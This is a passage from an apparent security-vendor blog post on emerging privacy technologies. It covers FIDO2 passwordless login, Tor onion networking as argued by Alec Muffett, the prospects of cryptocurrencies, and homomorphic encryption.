Passwordless authentication is possible today but still extremely rare. However, it took a big step forward in May this year when Google, Microsoft, and Apple made simultaneous, coordinated pledges to increase their adoption of the FIDO2 standard.

**Onion networking**

Onion networking, the technology behind Tor and the “dark web”, has been around for twenty years, so it might seem an odd candidate for an emerging technology that could change everything—but what if that’s just because we’ve been thinking about it the wrong way?

Tor is a network of servers that allows software clients (like web browsers) and services (like websites) to communicate securely and anonymously. Although the software is extremely good at what it does, today it services a narrow niche of users who put privacy and security above all, and it has become strongly associated with ransomware, illegal drug markets, and other forms of unsavoury criminal activity.

According to security evangelist Alec Muffett, we are overlooking a very important aspect of this technology though. Muffett was previously a security engineer at Facebook, where he was responsible for putting the social network on Tor. Speaking to David Ruiz on a recent Malwarebytes Lock and Code podcast, he explained how he sees Tor as “a brand new networking stack for the Internet” that can “guarantee integrity, and privacy, and unblockability of communication.”

Every Tor address is also the cryptographic public key of the service you want to talk to. For example, the Facebook address is:

www.facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion

Having the public key act as the address provides cryptographic assurance that you are talking to the service you want to talk to, bypassing several layers of the OSI model, and cutting out fundamental Internet vulnerabilities, such as BGP hijacking.

We should stop thinking about Tor as just an anonymity tool, says Muffet. It should be attractive to anyone who cares about the integrity of their brand and what it has to say:

> If you are in the position of providing a forum, a messenger service, or news to a mass public … where your brand name is a really important part of your value proposition, then onion networking is for you, because you can make sure that no one can mess with your traffic.
> 
> Alec Muffet speaking to Lock and Code.

Although mainstream organizations like The New York Times, Pro Publica, Facebook, and Twitter have already embraced Tor, having a .onion site is still very much the exception. In all likelihood, it will take something quite dramatic to change that, but that doesn’t mean it can’t happen.

In 2013, Edward Snowden’s revelations about pervasive Internet surveillance triggered a huge gobal effort to make encrypted web traffic the norm, rather than the exception.

A similar stimulus today could tip onion networking from its niche into the mainstream.

**Cryptocurrencies**

People may be surprised to see cryptocurrencies appearing in our list. If cryptotrading sites are naming stadia and buying superbowl ads then cryptocurrencies are already mainstream and hardly a technology for the future, surely.

Its presence near the bottom of our list tells you that isn’t how we see it.

Cryptocurrencies face a number of cyclone-force headwinds, starting with the current, across-the-board, price crash. The market cap of the biggest currencies, Bitcoin and Ether, is shrinking fast, and some cryptocurrencies have already disappeared completely; the free flow of venture capital money is likely to dry up; there are issues with scalability, scams, rug pulls, thefts from exchanges, and environmental damage; and the pseudo-anonymity blockchains provide is challenged by our ever-improving capacity to identify patterns in payments.

More importantly, from the perspective of _life, liberty, and the pursuit of happiness_, almost nobody is using these currencies as actual currencies—nobody is paid in Bitcoin, and nobody is using Ether to buy groceries. Remember, Bitcoin was supposed to be a peer-to-peer electronic cash system not a vehicle for speculative trading.

So why is it on our list at all?

For all the reasons to dislike them or write them off, cryptocurrencies are hard to ignore. At its core, the original cryptocurrency, Bitcoin, was supposed to be a trustless, borderless payment system that was built on top of the Internet.

> What is needed is an electronic payment system based on cryptographic proof instead of trust, allowing any two willing parties to transact directly with each other without the need for a trusted third party.
> 
> “Satoshi Nakamoto”, from Bitcoin: A Peer-to-Peer Electronic Cash System

It was a vision of what freedom might look like in the digital age.

That desire for freedom propelled Bitcoin it in its early days, and the attractiveness of a private, peer-to-peer currency is undimmed, even if nobody has managed to actually build one that works yet.

The current crash will pass and the strongest ideas and technology will survive. We suspect that Satoshi’s original vision will be one of them, even if Bitcoin isn’t.

**Homomorphic encryption**

The cornerstone of digital privacy, security, and freedom is encryption, and the last item in our list is one of its holy grails: Encryption that never needs to be undone.

Encryption protects your data if your phone is stolen, and it makes your emails, credit card details, and WhatsApp messages tamper proof as they whizz around the Internet. And it’s what underpins all of the other things in our list.

And all of the examples above have something in common: They are either examples of encryption that’s used to protect data at rest, or data that’s in transit. Moving or storing data only gets you so far though, sooner or later it has to be used. It can’t be used unless it’s decrypted, and you need to trust whatever system has access to that decrypted data.

Homomorphic encryption algorithms allow mathematical operations to be performed on encrypted data, so that it doesn’t need to be decrypted at all, ever, even when it’s being used.

The result of performing a mathematical operation on the encrypted data is the same as if the data was decrypted, subject to a mathematical operation, and the answer encrypted.

This incredible act of needle threading needs to ensure that you can’t learn anything about the data from the ciphertext (the encrypted version of the data), and that you can’t learn anything at all about it by observing the mathematical operations performed on it.

If you had access to homomorphic encryption you wouldn’t have to trust anyone you share your data with, whether they are the vendors in your organization’s supply chain, or your favorite, data-hungry social network.

Almost unbelievably, homomorphic encryption algorithms already exist. The reason you don’t have access to their almost magical properties though is that they are prohibitively slow. It currently takes days for them to perform actions that we expect to take seconds.

Although slow, these algorithms are already millions of times quicker than they were just a few years ago. And while that rate of improvement will surely decelerate, the processing power of computers is still doubling every few years.

At some point in the not-too-distant future, when these two trends meet, it could change how we think about trust and freedom in the digital age completely.

Tag

#wifi